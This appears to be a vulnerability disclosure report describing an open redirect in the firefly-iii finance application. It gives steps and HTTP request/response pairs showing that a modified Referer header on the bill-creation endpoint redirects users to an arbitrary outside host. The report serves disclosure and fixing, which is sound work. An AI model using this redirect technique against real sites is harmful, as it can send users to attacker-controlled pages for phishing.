Open Redirect in firefly-iii/firefly-iii
Reported on
Oct 1st 2021
Steps:
- Login in application and and navigate to bill section and create bill and capture the request.
Web applications use different techniques to redirect users to the next page. Apps may use URL query parameters, header values, with JavaScript code, or it may be backend code. In case of this application, the value of the “Referer” header was used to redirect to next page.
Original Request:
POST /bills/store HTTP/1.1
Host: demo.firefly-iii.org
.
.
.
Original Response:
HTTP/1.1 302 Found
location: https://demo.firefly-iii.org/bills/create
.
.
.
Modified Request:
POST /bills/store HTTP/1.1
Host: demo.firefly-iii.org
Referer: http://abc.com/
.
.
.
Modified Response:
HTTP/1.1 302 Found
location: http://abc.com/
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://abc.com/'" />
<title>Redirecting to http://abc.com/</title>
</head>
<body>
Redirecting to <a href="http://abc.com/">http://abc.com/</a>.
</body>
</html>